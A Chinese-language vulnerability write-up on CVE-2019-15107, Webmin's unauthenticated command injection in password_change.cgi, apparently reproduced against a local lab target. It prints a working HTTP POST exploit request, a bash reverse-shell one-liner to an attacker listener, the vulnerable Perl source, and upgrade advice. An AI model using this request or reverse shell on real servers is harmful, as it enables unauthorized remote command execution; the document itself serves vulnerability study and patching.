文章目录
Webmin 远程命令执行漏洞
1. 漏洞编号
CVE-2019-15107
2. 漏洞描述
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
3. 影响版本
漏洞影响版本为Webmin<=1.920
4. 利用方法(利用案例)
4.1 启动环境
访问靶场地址https://127.0.0.1:10000/
访问https://127.0.0.1:10000/password_change.cgi
4.2 漏洞复现
可以使用bp抓包然后修改数据包的方式
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
还可以使用HackBar,发送POST请求包,并添加攻击Payload
然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。
4.3 深度利用
尝试执行反弹shell命令
先将payload进行URL编码
bash -c "bash -i >& /dev/tcp/192.168.188.185/4444 0>&1"
kali监听4444端口,发送数据包
kali反弹成功
4.4 漏洞原因
出问题的地方就是这个password_change.cgi
1 #!/usr/bin/perl
2 # password_change.cgi
3 # Actually update a user's password by directly modifying /etc/shadow
4
5 BEGIN { push(@INC, "."); };
6 use WebminCore;
7
8 $ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl";
9 &init_config();
10 &ReadParse();
11 &get_miniserv_config(\%miniserv);
12 $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
13
14 # Validate inputs
15 $in{'new1'} ne '' || &pass_error($text{'password_enew1'});
16 $in{'new1'} eq $in{'new2'} || &pass_error($text{'password_enew2'});
17
18 # Is this a Webmin user?
19 if (&foreign_check("acl")) {
20 &foreign_require("acl", "acl-lib.pl");
21 ($wuser) = grep { $_->{'name'} eq $in{'user'} } &acl::list_users();
22 if ($wuser->{'pass'} eq 'x') {
23 # A Webmin user, but using Unix authentication
24 $wuser = undef;
25 }
26 elsif ($wuser->{'pass'} eq '*LK*' ||
27 $wuser->{'pass'} =~ /^\!/) {
28 &pass_error("Webmin users with locked accounts cannot change ".
29 "their passwords!");
30 }
31 }
32 if (!$in{'pam'} && !$wuser) {
33 $miniserv{'passwd_cindex'} ne '' && $miniserv{'passwd_mindex'} ne '' ||
34 die "Missing password file configuration";
35 }
37 if ($wuser) {
38 # Update Webmin user's password
39 $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
40 $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
41 $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
42 $perr && &pass_error(&text('password_enewpass', $perr));
43 $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
44 $wuser->{'temppass'} = 0;
45 &acl::modify_user($wuser->{'name'}, $wuser);
46 &reload_miniserv();
47 }
48 elsif ($gconfig{'passwd_cmd'}) {
49 # Use some configured command
50 $passwd_cmd = &has_command($gconfig{'passwd_cmd'});
51 $passwd_cmd || &pass_error("The password change command <tt>$gconfig{'passwd_cmd'}</tt> was not found");
52
53 &foreign_require("proc", "proc-lib.pl");
54 &clean_environment();
55 $ENV{'REMOTE_USER'} = $in{'user'}; # some programs need this
56 $passwd_cmd .= " ".quotemeta($in{'user'});
57 ($fh, $fpid) = &proc::pty_process_exec($passwd_cmd, 0, 0);
58 &reset_environment();
59 while(1) {
60 local $rv = &wait_for($fh,
61 '(new|re-enter).*:',
62 '(old|current|login).*:',
63 'pick a password',
64 'too\s+many\s+failures',
65 'attributes\s+changed\s+on|successfully\s+changed',
66 'pick your passwords');
67 $out .= $wait_for_input;
68 sleep(1);
69 if ($rv == 0) {
5. 附带文件
6. 加固建议
漏洞修复:
-
升级到1.930版本
-
在github上下载
password_change.cgi
文件
7. 参考信息
参考信息
8. 漏洞分类
远程命令执行漏洞(RCE)